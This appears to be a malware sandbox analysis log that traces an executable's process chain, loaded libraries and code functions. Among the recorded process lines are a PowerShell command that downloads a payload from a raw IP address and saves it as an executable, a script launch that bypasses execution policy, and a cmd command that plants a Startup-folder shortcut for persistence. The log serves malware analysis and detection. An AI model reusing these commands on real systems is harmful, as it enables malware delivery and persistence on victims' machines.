Source: C:\Users\Public\Guard.exeCode function: 6_2_00C5282A6_2_00C5282A
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C689BF6_2_00C689BF
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C66A746_2_00C66A74
Source: C:\Users\Public\Guard.exeCode function: 6_2_00CB0A3A6_2_00CB0A3A
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C8EDB26_2_00C8EDB2
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C5CD516_2_00C5CD51
Source: C:\Users\Public\Guard.exeCode function: 6_2_00CB0EB76_2_00CB0EB7
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C98E446_2_00C98E44
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C66FE66_2_00C66FE6
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C533B76_2_00C533B7
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C4D45D6_2_00C4D45D
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C5F4096_2_00C5F409
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C3F6A06_2_00C3F6A0
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C516B46_2_00C516B4
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C316636_2_00C31663
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C4F6286_2_00C4F628
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C578C36_2_00C578C3
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C5DBA56_2_00C5DBA5
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C51BA86_2_00C51BA8
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C69CE56_2_00C69CE5
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C4DD286_2_00C4DD28
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C51FC06_2_00C51FC0
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C5BFD66_2_00C5BFD6
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_005FB02011_2_005FB020
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_005F94E011_2_005F94E0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_005F9C8011_2_005F9C80
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_006123F511_2_006123F5
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_0067840011_2_00678400
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_0062650211_2_00626502
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_0062265E11_2_0062265E
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_005FE6F011_2_005FE6F0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_0061282A11_2_0061282A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_006289BF11_2_006289BF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_00626A7411_2_00626A74
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_00670A3A11_2_00670A3A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_0061CD5111_2_0061CD51
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_0064EDB211_2_0064EDB2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_00658E4411_2_00658E44
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_00670EB711_2_00670EB7
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_00626FE611_2_00626FE6
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_006133B711_2_006133B7
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_0060D45D11_2_0060D45D
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_0061F40911_2_0061F409
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_005F166311_2_005F1663
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_0060F62811_2_0060F628
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_006116B411_2_006116B4
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_005FF6A011_2_005FF6A0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_006178C311_2_006178C3
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_0061DBA511_2_0061DBA5
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_00611BA811_2_00611BA8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_00629CE511_2_00629CE5
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_0060DD2811_2_0060DD28
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_00611FC011_2_00611FC0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_0061BFD611_2_0061BFD6
Source: Joe Sandbox ViewDropped File: C:\Users\Public\Guard.exe D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: String function: 00601A36 appears 34 times
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: String function: 00610D17 appears 70 times
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: String function: 00618B30 appears 42 times
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: String function: 00007FF7EC148D58 appears 76 times
Source: C:\Users\Public\Guard.exeCode function: String function: 00C50D17 appears 70 times
Source: C:\Users\Public\Guard.exeCode function: String function: 00C58B30 appears 42 times
Source: C:\Users\Public\Guard.exeCode function: String function: 00C41A36 appears 34 times
Source: classification engineClassification label: mal100.expl.evad.winEXE@15/12@2/1
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1A3778 GetLastError,FormatMessageW,0_2_00007FF7EC1A3778
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC18CCE0 AdjustTokenPrivileges,CloseHandle,0_2_00007FF7EC18CCE0
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC18D5CC LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00007FF7EC18D5CC
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C88DE9 AdjustTokenPrivileges,CloseHandle,6_2_00C88DE9
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C89399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,6_2_00C89399
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_00648DE9 AdjustTokenPrivileges,CloseHandle,11_2_00648DE9
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_00649399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,11_2_00649399
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1A59D8 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_00007FF7EC1A59D8
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1BEB34 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00007FF7EC1BEB34
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1A6D04 CoInitialize,CoCreateInstance,CoUninitialize,0_2_00007FF7EC1A6D04
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC126580 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00007FF7EC126580
Source: C:\Users\user\Desktop\cxZuGa.exeFile created: C:\Users\Public\PublicProfile.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1532:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3220:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5776:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2kfl2jcw.pmc.ps1Jump to behavior
Source: C:\Users\Public\Guard.exeCommand line argument: xf6_2_00C45F8B
Source: cxZuGa.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\cxZuGa.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: cxZuGa.exeReversingLabs: Detection: 44%
Source: cxZuGa.exeVirustotal: Detection: 61%
Source: unknownProcess created: C:\Users\user\Desktop\cxZuGa.exe "C:\Users\user\Desktop\cxZuGa.exe"
Source: C:\Users\user\Desktop\cxZuGa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/TSKUVpnJ" -OutFile "C:\Users\Public\Guard.exe""
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\cxZuGa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\Guard.exe "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
Source: C:\Users\Public\Guard.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
Source: C:\Users\user\Desktop\cxZuGa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/TSKUVpnJ" -OutFile "C:\Users\Public\Guard.exe""Jump to behavior
Source: C:\Users\user\Desktop\cxZuGa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\Guard.exe "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 Jump to behavior
Source: C:\Users\Public\Guard.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exitJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"Jump to behavior
Source: C:\Users\user\Desktop\cxZuGa.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\Desktop\cxZuGa.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\cxZuGa.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\cxZuGa.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\Desktop\cxZuGa.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\cxZuGa.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\cxZuGa.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\cxZuGa.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\cxZuGa.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\cxZuGa.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\cxZuGa.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\Public\Guard.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Users\Public\Guard.exeSection loaded: version.dllJump to behavior
Source: C:\Users\Public\Guard.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\Public\Guard.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\Public\Guard.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\Public\Guard.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\Public\Guard.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\Public\Guard.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\Public\Guard.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\Public\Guard.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\Public\Guard.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\Public\Guard.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\Public\Guard.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\Public\Guard.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\Public\Guard.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\Public\Guard.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\Public\Guard.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\Public\Guard.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\Public\Guard.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: twext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cscui.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: dnsapi.dllJump to behavior
